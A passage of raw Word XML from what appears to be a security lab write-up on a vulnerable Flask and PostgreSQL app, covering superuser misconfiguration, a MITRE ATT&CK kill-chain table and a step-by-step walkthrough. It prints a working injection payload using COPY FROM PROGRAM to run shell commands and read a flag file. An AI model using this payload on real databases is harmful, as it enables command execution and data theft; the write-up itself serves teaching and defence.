          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>render_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'result.html', rows=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>result.fetchall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C32E7EB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Failure 2 — Superuser Privileges Granted to Application (Database Layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F7F491" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">The PostgreSQL instance is initialized with the application connecting as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> superuser. This grants the COPY TO/FROM PROGRAM privilege, which allows any SQL statement to pipe data through an arbitrary OS shell command. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>init.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6E427B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>init.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — superuser connection, no privilege restriction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F9406D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user has implicit SUPERUSER rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432963F9" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- COPY FROM PROGRAM is enabled for all superusers by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ED2126" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY table FROM PROGRAM '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell_command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>';  --</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executes OS command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151D728B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="25BFF9C4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 Kill Chain &amp; Exploitation Walkthrough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E13696" w14:paraId="715B885B" w14:textId="77777777">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0DDA1AE" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kill Chain Phase</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1906301" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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B33128C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="3DCD1F3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8B02DE" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reconnaissance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F9E991" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1190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826798" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker visits http://localhost:5001 and discovers /query endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="2A18EA13"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1344C18" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Weaponization</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E57DB88" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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B8DCDB2" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Crafts COPY FROM PROGRAM payload to execute cat /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/flag.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="6E79327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D8AE86" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Delivery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AC196E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1190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586721" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sends SQL payload as HTTP GET parameter to /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>query?q</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="3A689260"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A927C30" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation</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20B31FAC" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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2D2C1FC" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PostgreSQL executes OS command; output stored in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>temp_flag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="65310FA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C43EB2" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Actions on Objective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A619FD" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1005</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3FEB42" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT reads flag from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>temp_flag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>; Flask returns it in HTTP response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2631665C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="5030AD37" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step-by-Step Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7671EFFE" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Attacker sends a probe query to confirm SQL execution: GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>query?q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">=SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>version(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C10DB63" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>PostgreSQL version string is returned, confirming raw SQL injection and identifying the database engine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBD1F08" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker verifies superuser privilege: SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>; returns '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5C6D57" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Attacker runs the 4-line exploit payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DB9121" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DROP TABLE IF EXISTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>temp_flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195B4F65" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>temp_flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (content TEXT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F019634" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>temp_flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM PROGRAM 'cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/flag.txt';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEC31CA" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT content FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>temp_flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E31B7C" w14:textId="77777777" w:rsidR="008669D2" w:rsidRDefault="008669D2" w:rsidP="008669D2">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A30558" w14:textId="77777777" w:rsidR="008669D2" w:rsidRDefault="008669D2" w:rsidP="008669D2">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="597BBF4D" w14:textId="77777777" w:rsidR="008669D2" w:rsidRDefault="008669D2" w:rsidP="008669D2">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311F68A6" w14:textId="35EF52DB" w:rsidR="008669D2" w:rsidRDefault="008669D2" w:rsidP="008669D2">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="394A7D0B" wp14:editId="78D5693F">
            <wp:extent cx="4885267" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
